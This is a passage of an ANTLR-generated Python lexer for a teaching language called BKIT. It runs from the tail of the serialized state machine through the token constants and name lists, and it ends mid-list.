buf.write(\"\\u0130\\u012c\\3\\2\\2\\2\\u0130\\u012e\\3\\2\\2\\2\\u0131\\u0132\\3\")\n buf.write(\"\\2\\2\\2\\u0132\\u0136\\t\\13\\2\\2\\u0133\\u0135\\5\\'\\24\\2\\u0134\")\n buf.write(\"\\u0133\\3\\2\\2\\2\\u0135\\u0138\\3\\2\\2\\2\\u0136\\u0134\\3\\2\\2\\2\")\n buf.write(\"\\u0136\\u0137\\3\\2\\2\\2\\u0137,\\3\\2\\2\\2\\u0138\\u0136\\3\\2\\2\")\n buf.write(\"\\2\\u0139\\u0142\\t\\f\\2\\2\\u013a\\u013e\\t\\r\\2\\2\\u013b\\u013d\")\n buf.write(\"\\t\\4\\2\\2\\u013c\\u013b\\3\\2\\2\\2\\u013d\\u0140\\3\\2\\2\\2\\u013e\")\n buf.write(\"\\u013c\\3\\2\\2\\2\\u013e\\u013f\\3\\2\\2\\2\\u013f\\u0142\\3\\2\\2\\2\")\n buf.write(\"\\u0140\\u013e\\3\\2\\2\\2\\u0141\\u0139\\3\\2\\2\\2\\u0141\\u013a\\3\")\n buf.write(\"\\2\\2\\2\\u0142.\\3\\2\\2\\2\\u0143\\u0144\\7\\62\\2\\2\\u0144\\u0148\")\n buf.write(\"\\7q\\2\\2\\u0145\\u0146\\7\\62\\2\\2\\u0146\\u0148\\7Q\\2\\2\\u0147\")\n buf.write(\"\\u0143\\3\\2\\2\\2\\u0147\\u0145\\3\\2\\2\\2\\u0148\\u0149\\3\\2\\2\\2\")\n buf.write(\"\\u0149\\u014d\\t\\16\\2\\2\\u014a\\u014c\\5)\\25\\2\\u014b\\u014a\")\n buf.write(\"\\3\\2\\2\\2\\u014c\\u014f\\3\\2\\2\\2\\u014d\\u014b\\3\\2\\2\\2\\u014d\")\n buf.write(\"\\u014e\\3\\2\\2\\2\\u014e\\60\\3\\2\\2\\2\\u014f\\u014d\\3\\2\\2\\2\\u0150\")\n buf.write(\"\\u0154\\5-\\27\\2\\u0151\\u0154\\5+\\26\\2\\u0152\\u0154\\5/\\30\\2\")\n buf.write(\"\\u0153\\u0150\\3\\2\\2\\2\\u0153\\u0151\\3\\2\\2\\2\\u0153\\u0152\\3\")\n buf.write(\"\\2\\2\\2\\u0154\\62\\3\\2\\2\\2\\u0155\\u0156\\5\\35\\17\\2\\u0156\\64\")\n buf.write(\"\\3\\2\\2\\2\\u0157\\u015a\\5]/\\2\\u0158\\u015a\\5_\\60\\2\\u0159\\u0157\")\n buf.write(\"\\3\\2\\2\\2\\u0159\\u0158\\3\\2\\2\\2\\u015a\\66\\3\\2\\2\\2\\u015b\\u015f\")\n buf.write(\"\\5\\u00a7T\\2\\u015c\\u015e\\5%\\23\\2\\u015d\\u015c\\3\\2\\2\\2\\u015e\")\n buf.write(\"\\u0161\\3\\2\\2\\2\\u015f\\u015d\\3\\2\\2\\2\\u015f\\u0160\\3\\2\\2\\2\")\n buf.write(\"\\u0160\\u0162\\3\\2\\2\\2\\u0161\\u015f\\3\\2\\2\\2\\u0162\\u0163\\5\")\n 
buf.write(\"\\u00a7T\\2\\u0163\\u0164\\b\\34\\2\\2\\u01648\\3\\2\\2\\2\\u0165\\u0166\")\n buf.write(\"\\7D\\2\\2\\u0166\\u0167\\7q\\2\\2\\u0167\\u0168\\7f\\2\\2\\u0168\\u0169\")\n buf.write(\"\\7{\\2\\2\\u0169:\\3\\2\\2\\2\\u016a\\u016b\\7D\\2\\2\\u016b\\u016c\")\n buf.write(\"\\7t\\2\\2\\u016c\\u016d\\7g\\2\\2\\u016d\\u016e\\7c\\2\\2\\u016e\\u016f\")\n buf.write(\"\\7m\\2\\2\\u016f<\\3\\2\\2\\2\\u0170\\u0171\\7E\\2\\2\\u0171\\u0172\")\n buf.write(\"\\7q\\2\\2\\u0172\\u0173\\7p\\2\\2\\u0173\\u0174\\7v\\2\\2\\u0174\\u0175\")\n buf.write(\"\\7k\\2\\2\\u0175\\u0176\\7p\\2\\2\\u0176\\u0177\\7w\\2\\2\\u0177\\u0178\")\n buf.write(\"\\7g\\2\\2\\u0178>\\3\\2\\2\\2\\u0179\\u017a\\7F\\2\\2\\u017a\\u017b\")\n buf.write(\"\\7q\\2\\2\\u017b@\\3\\2\\2\\2\\u017c\\u017d\\7G\\2\\2\\u017d\\u017e\")\n buf.write(\"\\7n\\2\\2\\u017e\\u017f\\7u\\2\\2\\u017f\\u0180\\7g\\2\\2\\u0180B\\3\")\n buf.write(\"\\2\\2\\2\\u0181\\u0182\\7G\\2\\2\\u0182\\u0183\\7n\\2\\2\\u0183\\u0184\")\n buf.write(\"\\7u\\2\\2\\u0184\\u0185\\7g\\2\\2\\u0185\\u0186\\7K\\2\\2\\u0186\\u0187\")\n buf.write(\"\\7h\\2\\2\\u0187D\\3\\2\\2\\2\\u0188\\u0189\\7G\\2\\2\\u0189\\u018a\")\n buf.write(\"\\7p\\2\\2\\u018a\\u018b\\7f\\2\\2\\u018b\\u018c\\7K\\2\\2\\u018c\\u018d\")\n buf.write(\"\\7h\\2\\2\\u018dF\\3\\2\\2\\2\\u018e\\u018f\\7G\\2\\2\\u018f\\u0190\")\n buf.write(\"\\7p\\2\\2\\u0190\\u0191\\7f\\2\\2\\u0191\\u0192\\7D\\2\\2\\u0192\\u0193\")\n buf.write(\"\\7q\\2\\2\\u0193\\u0194\\7f\\2\\2\\u0194\\u0195\\7{\\2\\2\\u0195H\\3\")\n buf.write(\"\\2\\2\\2\\u0196\\u0197\\7G\\2\\2\\u0197\\u0198\\7p\\2\\2\\u0198\\u0199\")\n buf.write(\"\\7f\\2\\2\\u0199\\u019a\\7H\\2\\2\\u019a\\u019b\\7q\\2\\2\\u019b\\u019c\")\n buf.write(\"\\7t\\2\\2\\u019cJ\\3\\2\\2\\2\\u019d\\u019e\\7G\\2\\2\\u019e\\u019f\")\n buf.write(\"\\7p\\2\\2\\u019f\\u01a0\\7f\\2\\2\\u01a0\\u01a1\\7Y\\2\\2\\u01a1\\u01a2\")\n buf.write(\"\\7j\\2\\2\\u01a2\\u01a3\\7k\\2\\2\\u01a3\\u01a4\\7n\\2\\2\\u01a4\\u01a5\")\n 
buf.write(\"\\7g\\2\\2\\u01a5L\\3\\2\\2\\2\\u01a6\\u01a7\\7H\\2\\2\\u01a7\\u01a8\")\n buf.write(\"\\7q\\2\\2\\u01a8\\u01a9\\7t\\2\\2\\u01a9N\\3\\2\\2\\2\\u01aa\\u01ab\")\n buf.write(\"\\7H\\2\\2\\u01ab\\u01ac\\7w\\2\\2\\u01ac\\u01ad\\7p\\2\\2\\u01ad\\u01ae\")\n buf.write(\"\\7e\\2\\2\\u01ae\\u01af\\7v\\2\\2\\u01af\\u01b0\\7k\\2\\2\\u01b0\\u01b1\")\n buf.write(\"\\7q\\2\\2\\u01b1\\u01b2\\7p\\2\\2\\u01b2P\\3\\2\\2\\2\\u01b3\\u01b4\")\n buf.write(\"\\7K\\2\\2\\u01b4\\u01b5\\7h\\2\\2\\u01b5R\\3\\2\\2\\2\\u01b6\\u01b7\")\n buf.write(\"\\7R\\2\\2\\u01b7\\u01b8\\7c\\2\\2\\u01b8\\u01b9\\7t\\2\\2\\u01b9\\u01ba\")\n buf.write(\"\\7c\\2\\2\\u01ba\\u01bb\\7o\\2\\2\\u01bb\\u01bc\\7g\\2\\2\\u01bc\\u01bd\")\n buf.write(\"\\7v\\2\\2\\u01bd\\u01be\\7g\\2\\2\\u01be\\u01bf\\7t\\2\\2\\u01bfT\\3\")\n buf.write(\"\\2\\2\\2\\u01c0\\u01c1\\7T\\2\\2\\u01c1\\u01c2\\7g\\2\\2\\u01c2\\u01c3\")\n buf.write(\"\\7v\\2\\2\\u01c3\\u01c4\\7w\\2\\2\\u01c4\\u01c5\\7t\\2\\2\\u01c5\\u01c6\")\n buf.write(\"\\7p\\2\\2\\u01c6V\\3\\2\\2\\2\\u01c7\\u01c8\\7V\\2\\2\\u01c8\\u01c9\")\n buf.write(\"\\7j\\2\\2\\u01c9\\u01ca\\7g\\2\\2\\u01ca\\u01cb\\7p\\2\\2\\u01cbX\\3\")\n buf.write(\"\\2\\2\\2\\u01cc\\u01cd\\7X\\2\\2\\u01cd\\u01ce\\7c\\2\\2\\u01ce\\u01cf\")\n buf.write(\"\\7t\\2\\2\\u01cfZ\\3\\2\\2\\2\\u01d0\\u01d1\\7Y\\2\\2\\u01d1\\u01d2\")\n buf.write(\"\\7j\\2\\2\\u01d2\\u01d3\\7k\\2\\2\\u01d3\\u01d4\\7n\\2\\2\\u01d4\\u01d5\")\n buf.write(\"\\7g\\2\\2\\u01d5\\\\\\3\\2\\2\\2\\u01d6\\u01d7\\7V\\2\\2\\u01d7\\u01d8\")\n buf.write(\"\\7t\\2\\2\\u01d8\\u01d9\\7w\\2\\2\\u01d9\\u01da\\7g\\2\\2\\u01da^\\3\")\n buf.write(\"\\2\\2\\2\\u01db\\u01dc\\7H\\2\\2\\u01dc\\u01dd\\7c\\2\\2\\u01dd\\u01de\")\n buf.write(\"\\7n\\2\\2\\u01de\\u01df\\7u\\2\\2\\u01df\\u01e0\\7g\\2\\2\\u01e0`\\3\")\n buf.write(\"\\2\\2\\2\\u01e1\\u01e2\\7G\\2\\2\\u01e2\\u01e3\\7p\\2\\2\\u01e3\\u01e4\")\n buf.write(\"\\7f\\2\\2\\u01e4\\u01e5\\7F\\2\\2\\u01e5\\u01e6\\7q\\2\\2\\u01e6b\\3\")\n 
buf.write(\"\\2\\2\\2\\u01e7\\u01e8\\7-\\2\\2\\u01e8d\\3\\2\\2\\2\\u01e9\\u01ea\\7\")\n buf.write(\"-\\2\\2\\u01ea\\u01eb\\7\\60\\2\\2\\u01ebf\\3\\2\\2\\2\\u01ec\\u01ed\")\n buf.write(\"\\7/\\2\\2\\u01edh\\3\\2\\2\\2\\u01ee\\u01ef\\7/\\2\\2\\u01ef\\u01f0\")\n buf.write(\"\\7\\60\\2\\2\\u01f0j\\3\\2\\2\\2\\u01f1\\u01f2\\7,\\2\\2\\u01f2l\\3\\2\")\n buf.write(\"\\2\\2\\u01f3\\u01f4\\7,\\2\\2\\u01f4\\u01f5\\7\\60\\2\\2\\u01f5n\\3\")\n buf.write(\"\\2\\2\\2\\u01f6\\u01f7\\7^\\2\\2\\u01f7p\\3\\2\\2\\2\\u01f8\\u01f9\\7\")\n buf.write(\"^\\2\\2\\u01f9\\u01fa\\7\\60\\2\\2\\u01far\\3\\2\\2\\2\\u01fb\\u01fc\")\n buf.write(\"\\7\\'\\2\\2\\u01fct\\3\\2\\2\\2\\u01fd\\u01fe\\7#\\2\\2\\u01fev\\3\\2\")\n buf.write(\"\\2\\2\\u01ff\\u0200\\7(\\2\\2\\u0200\\u0201\\7(\\2\\2\\u0201x\\3\\2\")\n buf.write(\"\\2\\2\\u0202\\u0203\\7~\\2\\2\\u0203\\u0204\\7~\\2\\2\\u0204z\\3\\2\")\n buf.write(\"\\2\\2\\u0205\\u0206\\7?\\2\\2\\u0206\\u0207\\7?\\2\\2\\u0207|\\3\\2\")\n buf.write(\"\\2\\2\\u0208\\u0209\\7#\\2\\2\\u0209\\u020a\\7?\\2\\2\\u020a~\\3\\2\")\n buf.write(\"\\2\\2\\u020b\\u020c\\7>\\2\\2\\u020c\\u0080\\3\\2\\2\\2\\u020d\\u020e\")\n buf.write(\"\\7@\\2\\2\\u020e\\u0082\\3\\2\\2\\2\\u020f\\u0210\\7>\\2\\2\\u0210\\u0211\")\n buf.write(\"\\7?\\2\\2\\u0211\\u0084\\3\\2\\2\\2\\u0212\\u0213\\7@\\2\\2\\u0213\\u0214\")\n buf.write(\"\\7?\\2\\2\\u0214\\u0086\\3\\2\\2\\2\\u0215\\u0216\\7?\\2\\2\\u0216\\u0217\")\n buf.write(\"\\7\\61\\2\\2\\u0217\\u0218\\7?\\2\\2\\u0218\\u0088\\3\\2\\2\\2\\u0219\")\n buf.write(\"\\u021a\\7>\\2\\2\\u021a\\u021b\\7\\60\\2\\2\\u021b\\u008a\\3\\2\\2\\2\")\n buf.write(\"\\u021c\\u021d\\7@\\2\\2\\u021d\\u021e\\7\\60\\2\\2\\u021e\\u008c\\3\")\n buf.write(\"\\2\\2\\2\\u021f\\u0220\\7>\\2\\2\\u0220\\u0221\\7?\\2\\2\\u0221\\u0222\")\n buf.write(\"\\7\\60\\2\\2\\u0222\\u008e\\3\\2\\2\\2\\u0223\\u0224\\7@\\2\\2\\u0224\")\n buf.write(\"\\u0225\\7?\\2\\2\\u0225\\u0226\\7\\60\\2\\2\\u0226\\u0090\\3\\2\\2\\2\")\n 
buf.write(\"\\u0227\\u0228\\7*\\2\\2\\u0228\\u0092\\3\\2\\2\\2\\u0229\\u022a\\7\")\n buf.write(\"+\\2\\2\\u022a\\u0094\\3\\2\\2\\2\\u022b\\u022c\\7]\\2\\2\\u022c\\u0096\")\n buf.write(\"\\3\\2\\2\\2\\u022d\\u022e\\7_\\2\\2\\u022e\\u0098\\3\\2\\2\\2\\u022f\")\n buf.write(\"\\u0230\\7}\\2\\2\\u0230\\u009a\\3\\2\\2\\2\\u0231\\u0232\\7\\177\\2\")\n buf.write(\"\\2\\u0232\\u009c\\3\\2\\2\\2\\u0233\\u0234\\7<\\2\\2\\u0234\\u009e\")\n buf.write(\"\\3\\2\\2\\2\\u0235\\u0236\\7\\60\\2\\2\\u0236\\u00a0\\3\\2\\2\\2\\u0237\")\n buf.write(\"\\u0238\\7=\\2\\2\\u0238\\u00a2\\3\\2\\2\\2\\u0239\\u023a\\7.\\2\\2\\u023a\")\n buf.write(\"\\u00a4\\3\\2\\2\\2\\u023b\\u023c\\7?\\2\\2\\u023c\\u00a6\\3\\2\\2\\2\")\n buf.write(\"\\u023d\\u023e\\7$\\2\\2\\u023e\\u00a8\\3\\2\\2\\2\\u023f\\u0240\\7\")\n buf.write(\"k\\2\\2\\u0240\\u0241\\7p\\2\\2\\u0241\\u0242\\7v\\2\\2\\u0242\\u0243\")\n buf.write(\"\\7a\\2\\2\\u0243\\u0244\\7q\\2\\2\\u0244\\u0245\\7h\\2\\2\\u0245\\u0246\")\n buf.write(\"\\7a\\2\\2\\u0246\\u0247\\7h\\2\\2\\u0247\\u0248\\7n\\2\\2\\u0248\\u0249\")\n buf.write(\"\\7q\\2\\2\\u0249\\u024a\\7c\\2\\2\\u024a\\u024b\\7v\\2\\2\\u024b\\u00aa\")\n buf.write(\"\\3\\2\\2\\2\\u024c\\u024d\\7k\\2\\2\\u024d\\u024e\\7p\\2\\2\\u024e\\u024f\")\n buf.write(\"\\7v\\2\\2\\u024f\\u0250\\7a\\2\\2\\u0250\\u0251\\7q\\2\\2\\u0251\\u0252\")\n buf.write(\"\\7h\\2\\2\\u0252\\u0253\\7a\\2\\2\\u0253\\u0254\\7u\\2\\2\\u0254\\u0255\")\n buf.write(\"\\7v\\2\\2\\u0255\\u0256\\7t\\2\\2\\u0256\\u0257\\7k\\2\\2\\u0257\\u0258\")\n buf.write(\"\\7p\\2\\2\\u0258\\u0259\\7i\\2\\2\\u0259\\u00ac\\3\\2\\2\\2\\u025a\\u025b\")\n buf.write(\"\\7h\\2\\2\\u025b\\u025c\\7n\\2\\2\\u025c\\u025d\\7q\\2\\2\\u025d\\u025e\")\n buf.write(\"\\7c\\2\\2\\u025e\\u025f\\7v\\2\\2\\u025f\\u0260\\7a\\2\\2\\u0260\\u0261\")\n buf.write(\"\\7v\\2\\2\\u0261\\u0262\\7q\\2\\2\\u0262\\u0263\\7a\\2\\2\\u0263\\u0264\")\n buf.write(\"\\7k\\2\\2\\u0264\\u0265\\7p\\2\\2\\u0265\\u0266\\7v\\2\\2\\u0266\\u00ae\")\n 
buf.write(\"\\3\\2\\2\\2\\u0267\\u0268\\7h\\2\\2\\u0268\\u0269\\7n\\2\\2\\u0269\\u026a\")\n buf.write(\"\\7q\\2\\2\\u026a\\u026b\\7c\\2\\2\\u026b\\u026c\\7v\\2\\2\\u026c\\u026d\")\n buf.write(\"\\7a\\2\\2\\u026d\\u026e\\7q\\2\\2\\u026e\\u026f\\7h\\2\\2\\u026f\\u0270\")\n buf.write(\"\\7a\\2\\2\\u0270\\u0271\\7u\\2\\2\\u0271\\u0272\\7v\\2\\2\\u0272\\u0273\")\n buf.write(\"\\7t\\2\\2\\u0273\\u0274\\7k\\2\\2\\u0274\\u0275\\7p\\2\\2\\u0275\\u0276\")\n buf.write(\"\\7i\\2\\2\\u0276\\u00b0\\3\\2\\2\\2\\u0277\\u0278\\7d\\2\\2\\u0278\\u0279\")\n buf.write(\"\\7q\\2\\2\\u0279\\u027a\\7q\\2\\2\\u027a\\u027b\\7n\\2\\2\\u027b\\u027c\")\n buf.write(\"\\7a\\2\\2\\u027c\\u027d\\7q\\2\\2\\u027d\\u027e\\7h\\2\\2\\u027e\\u027f\")\n buf.write(\"\\7a\\2\\2\\u027f\\u0280\\7u\\2\\2\\u0280\\u0281\\7v\\2\\2\\u0281\\u0282\")\n buf.write(\"\\7t\\2\\2\\u0282\\u0283\\7k\\2\\2\\u0283\\u0284\\7p\\2\\2\\u0284\\u0285\")\n buf.write(\"\\7i\\2\\2\\u0285\\u00b2\\3\\2\\2\\2\\u0286\\u0287\\7u\\2\\2\\u0287\\u0288\")\n buf.write(\"\\7v\\2\\2\\u0288\\u0289\\7t\\2\\2\\u0289\\u028a\\7k\\2\\2\\u028a\\u028b\")\n buf.write(\"\\7p\\2\\2\\u028b\\u028c\\7i\\2\\2\\u028c\\u028d\\7a\\2\\2\\u028d\\u028e\")\n buf.write(\"\\7q\\2\\2\\u028e\\u028f\\7h\\2\\2\\u028f\\u0290\\7a\\2\\2\\u0290\\u0291\")\n buf.write(\"\\7d\\2\\2\\u0291\\u0292\\7q\\2\\2\\u0292\\u0293\\7q\\2\\2\\u0293\\u0294\")\n buf.write(\"\\7n\\2\\2\\u0294\\u00b4\\3\\2\\2\\2\\u0295\\u0296\\7u\\2\\2\\u0296\\u0297\")\n buf.write(\"\\7v\\2\\2\\u0297\\u0298\\7t\\2\\2\\u0298\\u0299\\7k\\2\\2\\u0299\\u029a\")\n buf.write(\"\\7p\\2\\2\\u029a\\u029b\\7i\\2\\2\\u029b\\u029c\\7a\\2\\2\\u029c\\u029d\")\n buf.write(\"\\7q\\2\\2\\u029d\\u029e\\7h\\2\\2\\u029e\\u029f\\7a\\2\\2\\u029f\\u02a0\")\n buf.write(\"\\7k\\2\\2\\u02a0\\u02a1\\7p\\2\\2\\u02a1\\u02a2\\7v\\2\\2\\u02a2\\u00b6\")\n buf.write(\"\\3\\2\\2\\2\\u02a3\\u02a4\\7u\\2\\2\\u02a4\\u02a5\\7v\\2\\2\\u02a5\\u02a6\")\n buf.write(\"\\7t\\2\\2\\u02a6\\u02a7\\7k\\2\\2\\u02a7\\u02a8\\7p\\2\\2\\u02a8\\u02a9\")\n 
buf.write(\"\\7i\\2\\2\\u02a9\\u02aa\\7a\\2\\2\\u02aa\\u02ab\\7q\\2\\2\\u02ab\\u02ac\")\n buf.write(\"\\7h\\2\\2\\u02ac\\u02ad\\7a\\2\\2\\u02ad\\u02ae\\7h\\2\\2\\u02ae\\u02af\")\n buf.write(\"\\7n\\2\\2\\u02af\\u02b0\\7q\\2\\2\\u02b0\\u02b1\\7c\\2\\2\\u02b1\\u02b2\")\n buf.write(\"\\7v\\2\\2\\u02b2\\u00b8\\3\\2\\2\\2\\u02b3\\u02b4\\7,\\2\\2\\u02b4\\u02b5\")\n buf.write(\"\\7,\\2\\2\\u02b5\\u02b9\\3\\2\\2\\2\\u02b6\\u02b8\\13\\2\\2\\2\\u02b7\")\n buf.write(\"\\u02b6\\3\\2\\2\\2\\u02b8\\u02bb\\3\\2\\2\\2\\u02b9\\u02ba\\3\\2\\2\\2\")\n buf.write(\"\\u02b9\\u02b7\\3\\2\\2\\2\\u02ba\\u02bc\\3\\2\\2\\2\\u02bb\\u02b9\\3\")\n buf.write(\"\\2\\2\\2\\u02bc\\u02bd\\7,\\2\\2\\u02bd\\u02be\\7,\\2\\2\\u02be\\u02bf\")\n buf.write(\"\\3\\2\\2\\2\\u02bf\\u02c0\\b]\\3\\2\\u02c0\\u00ba\\3\\2\\2\\2\\u02c1\")\n buf.write(\"\\u02c3\\t\\17\\2\\2\\u02c2\\u02c1\\3\\2\\2\\2\\u02c3\\u02c4\\3\\2\\2\")\n buf.write(\"\\2\\u02c4\\u02c2\\3\\2\\2\\2\\u02c4\\u02c5\\3\\2\\2\\2\\u02c5\\u02c6\")\n buf.write(\"\\3\\2\\2\\2\\u02c6\\u02c7\\b^\\3\\2\\u02c7\\u00bc\\3\\2\\2\\2\\u02c8\")\n buf.write(\"\\u02cc\\7$\\2\\2\\u02c9\\u02cb\\5%\\23\\2\\u02ca\\u02c9\\3\\2\\2\\2\")\n buf.write(\"\\u02cb\\u02ce\\3\\2\\2\\2\\u02cc\\u02ca\\3\\2\\2\\2\\u02cc\\u02cd\\3\")\n buf.write(\"\\2\\2\\2\\u02cd\\u02cf\\3\\2\\2\\2\\u02ce\\u02cc\\3\\2\\2\\2\\u02cf\\u02d0\")\n buf.write(\"\\5\\37\\20\\2\\u02d0\\u02d1\\b_\\4\\2\\u02d1\\u00be\\3\\2\\2\\2\\u02d2\")\n buf.write(\"\\u02d6\\7$\\2\\2\\u02d3\\u02d5\\5%\\23\\2\\u02d4\\u02d3\\3\\2\\2\\2\")\n buf.write(\"\\u02d5\\u02d8\\3\\2\\2\\2\\u02d6\\u02d4\\3\\2\\2\\2\\u02d6\\u02d7\\3\")\n buf.write(\"\\2\\2\\2\\u02d7\\u02da\\3\\2\\2\\2\\u02d8\\u02d6\\3\\2\\2\\2\\u02d9\\u02db\")\n buf.write(\"\\t\\20\\2\\2\\u02da\\u02d9\\3\\2\\2\\2\\u02db\\u02dc\\3\\2\\2\\2\\u02dc\")\n buf.write(\"\\u02dd\\b`\\5\\2\\u02dd\\u00c0\\3\\2\\2\\2\\u02de\\u02df\\7,\\2\\2\\u02df\")\n buf.write(\"\\u02e0\\7,\\2\\2\\u02e0\\u02e6\\3\\2\\2\\2\\u02e1\\u02e2\\7,\\2\\2\\u02e2\")\n 
buf.write(\"\\u02e5\\n\\21\\2\\2\\u02e3\\u02e5\\n\\21\\2\\2\\u02e4\\u02e1\\3\\2\\2\")\n buf.write(\"\\2\\u02e4\\u02e3\\3\\2\\2\\2\\u02e5\\u02e8\\3\\2\\2\\2\\u02e6\\u02e7\")\n buf.write(\"\\3\\2\\2\\2\\u02e6\\u02e4\\3\\2\\2\\2\\u02e7\\u02e9\\3\\2\\2\\2\\u02e8\")\n buf.write(\"\\u02e6\\3\\2\\2\\2\\u02e9\\u02ea\\7\\2\\2\\3\\u02ea\\u00c2\\3\\2\\2\\2\")\n buf.write(\"\\u02eb\\u02ec\\13\\2\\2\\2\\u02ec\\u00c4\\3\\2\\2\\2\\\"\\2\\u00ca\\u00cc\")\n buf.write(\"\\u00da\\u00de\\u00e4\\u00eb\\u00f1\\u00fb\\u0100\\u0105\\u010b\")\n buf.write(\"\\u0111\\u0115\\u0118\\u0126\\u0130\\u0136\\u013e\\u0141\\u0147\")\n buf.write(\"\\u014d\\u0153\\u0159\\u015f\\u02b9\\u02c4\\u02cc\\u02d6\\u02da\")\n buf.write(\"\\u02e4\\u02e6\\6\\3\\34\\2\\b\\2\\2\\3_\\3\\3`\\4\")\n return buf.getvalue()\n\n\nclass BKITLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n ID = 1\n REL_OP = 2\n BIN_LOGICAL_OP = 3\n ADD_OP = 4\n MUL_OP = 5\n UN_LOGICAL_OP = 6\n UN_OP = 7\n INT_LIT = 8\n FLOAT_LIT = 9\n BOOL_LIT = 10\n STRING_LIT = 11\n BODY = 12\n BREAK = 13\n CONTINUE = 14\n DO = 15\n ELSE = 16\n ELSEIF = 17\n ENDIF = 18\n ENDBODY = 19\n ENDFOR = 20\n ENDWHILE = 21\n FOR = 22\n FUNCTION = 23\n IF = 24\n PARAMETER = 25\n RETURN = 26\n THEN = 27\n VAR = 28\n WHILE = 29\n TRUE = 30\n FALSE = 31\n ENDDO = 32\n PLUS_INT = 33\n PLUS_FLOAT = 34\n MINUS_INT = 35\n MINUS_FLOAT = 36\n STAR_INT = 37\n STAR_FLOAT = 38\n DIV_INT = 39\n DIV_FLOAT = 40\n MOD = 41\n NOT = 42\n AND = 43\n OR = 44\n EQUAL = 45\n NOT_EQUAL_INT = 46\n LESS_INT = 47\n GREATER_INT = 48\n LESS_OR_EQUAL_INT = 49\n GREATER_OR_EQUAL_INT = 50\n NOT_EQUAL_FLOAT = 51\n LESS_FLOAT = 52\n GREATER_FLOAT = 53\n LESS_OR_EQUAL_FLOAT = 54\n GREATER_OR_EQUAL_FLOAT = 55\n LEFT_PAREN = 56\n RIGHT_PAREN = 57\n LEFT_BRACKET = 58\n RIGHT_BRACKET = 59\n LEFT_BRACE = 60\n RIGHT_BRACE = 61\n COLON = 62\n DOT = 63\n SEMI = 64\n COMMA = 65\n ASSIGN = 66\n 
DOUBLE_QUOTE = 67\n INT_OF_FLOAT = 68\n INT_OF_STRING = 69\n FLOAT_TO_INT = 70\n FLOAT_OF_STRING = 71\n BOOL_OF_STRING = 72\n STRING_OF_BOOL = 73\n STRING_OF_INT = 74\n STRING_OF_FLOAT = 75\n COMMENT = 76\n WS = 77\n ILLEGAL_ESCAPE = 78\n UNCLOSE_STRING = 79\n UNTERMINATED_COMMENT = 80\n ERROR_CHAR = 81\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" ]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \"'Else'\", \"'ElseIf'\", \n \"'EndIf'\", \"'EndBody'\", \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \n \"'If'\", \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \n \"'True'\", \"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \n \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \"'&&'\", \"'||'\", \n \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \"'>='\", \"'=/='\", \"'<.'\", \n \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \n \"'}'\", \"':'\", \"'.'\", \"';'\", \"','\", \"'='\", \"'\\\"'\", \"'int_of_float'\", \n \"'int_of_string'\", \"'float_to_int'\", \"'float_of_string'\", \"'bool_of_string'\", \n \"'string_of_bool'\", \"'string_of_int'\", \"'string_of_float'\" ]\n\n symbolicNames = [ \"<INVALID>\",\n \"ID\", \"REL_OP\", \"BIN_LOGICAL_OP\", \"ADD_OP\", \"MUL_OP\", \"UN_LOGICAL_OP\", \n \"UN_OP\", \"INT_LIT\", \"FLOAT_LIT\", \"BOOL_LIT\", \"STRING_LIT\", \"BODY\", \n \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \"ELSEIF\", \"ENDIF\", \"ENDBODY\", \n \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \n \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \n \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \n \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \n \"GREATER_OR_EQUAL_INT\", \"NOT_EQUAL_FLOAT\", 
\"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\", \"DOUBLE_QUOTE\", \n \"INT_OF_FLOAT\", \"INT_OF_STRING\", \"FLOAT_TO_INT\", \"FLOAT_OF_STRING\", \n \"BOOL_OF_STRING\", \"STRING_OF_BOOL\", \"STRING_OF_INT\", \"STRING_OF_FLOAT\", \n \"COMMENT\", \"WS\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\" ]\n\n ruleNames = [ \"ID\", \"REL_OP\", \"BIN_LOGICAL_OP\", \"ADD_OP\", \"MUL_OP\", \n \"UN_LOGICAL_OP\", \"UN_OP\", \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \n \"DIGIT\", \"LETTER\", \"SCIENTIFIC\", \"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \n \"ILL_ESC_SEQUENCE\", \"SUP_ESC_SEQUENCE\", \"DOUBLE_QUOTE_IN_STRING\", \n \"STRING_CHAR\", \"HEXADECIMALDIGIT\", \"OCTALDIGIT\", \"HEXADECIMAL\", \n \"DECIMAL\", \"OCTAL\", \"INT_LIT\", \"FLOAT_LIT\", \"BOOL_LIT\", \n \"STRING_LIT\", \"BODY\", \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \n \"ELSEIF\", \"ENDIF\", \"ENDBODY\", \"ENDFOR\", \"ENDWHILE\", \"FOR\", \n 